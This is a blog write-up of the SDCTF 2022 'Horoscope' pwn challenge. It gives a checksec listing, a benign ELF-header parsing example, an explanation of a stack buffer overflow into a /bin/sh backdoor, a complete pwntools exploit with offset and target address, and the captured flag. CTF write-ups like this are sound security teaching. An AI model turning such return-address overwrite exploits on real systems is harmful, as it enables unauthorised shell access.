Aynakeya's Blog

Kill My Emotion

[Pwn] Horoscope [SDCTF 2022]

0x0 Introduction

Easy

This program will predict your future!

Connect
nc horoscope.sdc.tf 1337

By green beans

files: horoscope

0x1 Mitigation

```
Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)
```
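The PIE, NX and RELRO lines in the listing above are read straight from the ELF headers. The following added example (not part of the original writeup, and not the checksec implementation) derives those three fields from raw bytes; `checksec` and `sample` are names chosen here, the input is a constructed header rather than the challenge binary, and the canary check is left out because it needs a symbol lookup.

```python
import struct

ET_EXEC, ET_DYN = 2, 3
PT_DYNAMIC, PT_GNU_STACK, PT_GNU_RELRO = 2, 0x6474E551, 0x6474E552
PF_X = 0x1
DT_NULL, DT_BIND_NOW, DT_FLAGS, DF_BIND_NOW = 0, 24, 30, 0x8
EHDR, PHDR, DYN = "<16sHHIQQQIHHHHHH", "<IIQQQQQQ", "<qQ"


def checksec(elf: bytes) -> dict:
    """Derive PIE / NX / RELRO from the headers of a little-endian ELF64 image."""
    if len(elf) < struct.calcsize(EHDR) or elf[:6] != b"\x7fELF\x02\x01":
        raise ValueError("not a little-endian ELF64 image")
    hdr = struct.unpack_from(EHDR, elf, 0)
    e_type, e_phoff, e_phentsize, e_phnum = hdr[1], hdr[5], hdr[9], hdr[10]
    # NX starts as False: without PT_GNU_STACK the stack may be mapped executable.
    out = {"PIE": e_type == ET_DYN, "NX": False, "RELRO": "No RELRO"}
    bind_now = False
    for i in range(e_phnum):
        p_type, p_flags, p_offset, _, _, p_filesz, _, _ = struct.unpack_from(
            PHDR, elf, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            out["NX"] = not (p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            out["RELRO"] = "Partial RELRO"
        elif p_type == PT_DYNAMIC:
            # Simplified: only DT_BIND_NOW and DT_FLAGS are consulted.
            for off in range(p_offset, p_offset + p_filesz, 16):
                tag, val = struct.unpack_from(DYN, elf, off)
                if tag == DT_NULL:
                    break
                bind_now |= tag == DT_BIND_NOW or (tag == DT_FLAGS and bool(val & DF_BIND_NOW))
    if bind_now and out["RELRO"] == "Partial RELRO":
        out["RELRO"] = "Full RELRO"  # GOT is resolved at load time, then made read-only
    return out


def sample(e_type: int, stack_flags: int, bind_now: bool) -> bytes:
    """Constructed image: ELF header, three program headers, a tiny dynamic section."""
    dyn = struct.pack(DYN, DT_BIND_NOW if bind_now else DT_NULL, 0) + struct.pack(DYN, DT_NULL, 0)
    ehdr = struct.pack(EHDR, b"\x7fELF\x02\x01\x01" + bytes(9), e_type, 62, 1,
                       0, 64, 0, 0, 64, 56, 3, 0, 0, 0)
    phdrs = b"".join(struct.pack(PHDR, t, f, o, 0, 0, s, s, 8) for t, f, o, s in [
        (PT_GNU_STACK, stack_flags, 0, 0), (PT_GNU_RELRO, 4, 0, 0),
        (PT_DYNAMIC, 6, 64 + 3 * 56, len(dyn))])
    return ehdr + phdrs + dyn


if __name__ == "__main__":
    # Same shape as the listing above: ET_EXEC, rw- stack, lazy binding.
    print(checksec(sample(ET_EXEC, 0x6, False)))
```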

0x2 Vulnerability

The binary has a /bin/sh backdoor in the function sym.test.

main has a buffer overflow vulnerability. With no stack canary and no PIE, we can overwrite main's saved return address (rip) with the address of sym.test and get a shell.

0x3 Exploit

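```python
#!/usr/bin/env python3

from pwn import *

exe = ELF("./horoscope")

context.binary = exe


def conn():
    # LOCAL runs the binary as a local process (DEBUG attaches gdb);
    # otherwise connect to the challenge server.
    if args.LOCAL:
        r = process([exe.path])
        if args.DEBUG:
            gdb.attach(r)
    else:
        r = remote("horoscope.sdc.tf", 1337)

    return r


io = conn()
if args.R2:
    # Pause so r2 can be attached before the payload is sent
    input("asd")
io.sendlineafter(b"own horoscope\n", flat({
    # Horoscope input string, NUL-terminated
    0: b"01/01/2001/1234\x00",
    # Offset 0x30+8 reaches main's saved return address; point it at sym.test
    0x30 + 8: 0x0040095f
}))
io.interactive()
```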

0x4 Flag

sdctf{S33ms_y0ur_h0rO5c0p3_W4s_g00d_1oD4y}
